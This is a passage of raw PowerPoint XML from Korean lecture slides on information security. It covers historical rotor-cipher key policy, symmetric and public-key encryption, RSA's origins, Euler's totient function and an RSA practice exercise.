              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="140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a:t>날마다 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" err="1"/>
              <a:t>회전자</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t> 초기 위치가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" err="1"/>
              <a:t>적혀있는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t> 책이 존재</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="140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a:t>ABC</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="140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t>개인의 설정할 키를</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>책에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" err="1"/>
              <a:t>적혀저</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t> 있는 키로 암호화한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>policy - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>한번 사용한 개인 설정 키는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>다시 사용하지 않는다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.!</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="140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a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NAVY</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="140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a:t>XYZW</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="140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p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>ABC</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="140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err="1"/>
              <a:t>평문</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>암호화된 개인키로 암호화한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="140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a:t>IAMHUNGRY</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="140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a:t>XHETLSPLW</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="140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p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>XYZW</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="140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a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>결국</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>암호체계 자체는 그 당시의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>컴퓨터 환경</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>에 비해 안전했으나</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>policy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>가 지켜지지 않아서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>영화와 같은 크래킹이 가능</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="140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435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/Theory/T5 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>현대</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>암호</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>RSA</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RSA </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>암호</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AES</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AES </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>암호</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DES</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DES </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>암호</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3" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Block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Block </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>암호</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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>암호 기술 실습</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="16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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>• RSA </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1600" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>제작 및 최적화</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="16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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>     - RSA </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1600" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>제작 실습 및 최적화 방법 소개</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="16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 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>현대암호</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26732195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a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>현대암호 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>대칭키</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>vs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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err="1"/>
              <a:t>대칭키</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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a:t>암호화 키 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>복호화 키</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>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err="1"/>
              <a:t>키교환</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 필요</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>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a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>현대암호 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>대칭키</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>vs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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a:t>공개키 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>모든 사람이 접근 가능한 키</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>개인키 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>사용자만이 가지고 있는 키</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>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err="1"/>
              <a:t>키교환</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 할 필요가 없음</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>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/Plan/Inforsec</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>강의안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정보보호</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1200" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>주교재</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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>- </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1200" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>강의안</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참고교재 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1200" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>필수는 아님</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>)</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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>- </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1200" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>정보보호총론</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1200" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>장상수</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1200" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>생능출판</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a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>현대암호 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>– RSA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>현대암호 실습 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>– RSA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>RSA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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RSA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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공개키 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="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RSA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"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sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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개인키와 암호문을 복사 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>붙혀넣기</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a: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RSA is a public-key cryptosystem that is widely used for secure data transmission. It is also one of the oldest. The acronym RSA comes from the surnames of Ron Rivest, Adi Shamir, and Leonard Adleman, who publicly described the algorithm in 1977. An equivalent system was developed secretly, in 1973 at GCHQ by the English mathematician Clifford Cocks. That system was declassified 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RSA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>는 안전한 데이터 전송에 널리 사용되는 공개 키 암호화 시스템입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>또한 가장 오래된 것 중 하나입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>RSA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>의 약어는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Ron Rivest, Adi Shamir </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Leonard Adleman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>의 성에서 유래되었으며 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>1977 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>년 알고리즘을 공개적으로 설명했습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>1973 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>년 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>GCHQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>에서 영어 수학자 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Clifford Cocks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>에 의해 동일한 시스템이 비밀리에 개발되었습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>이 시스템은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>1997 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>년에 기밀 해제되었습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>오일러</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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a:effectLst/>
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>φ(n)  : 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="0" i="0">
                <a:effectLst/>
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>부터 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="0" i="0">
                <a:effectLst/>
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="0" i="0">
                <a:effectLst/>
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>까지의 양의 정수 중에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="0" i="0">
                <a:effectLst/>
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="0" i="0">
                <a:effectLst/>
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>과 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>서로소</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="0" i="0">
                <a:effectLst/>
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>인 것의 개수</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="240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a:t>ex)  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="0" i="0">
                <a:effectLst/>
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>φ(6) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="0" i="0">
                <a:effectLst/>
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>값은</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="0" i="0">
                <a:effectLst/>
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400"/>
              <a:t>   { 1, 5 } =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="0" i="0">
                <a:effectLst/>
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>φ(6) = 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400">
              <a:latin typeface="Nanum Gothic"/>
            </a:endParaRPr>
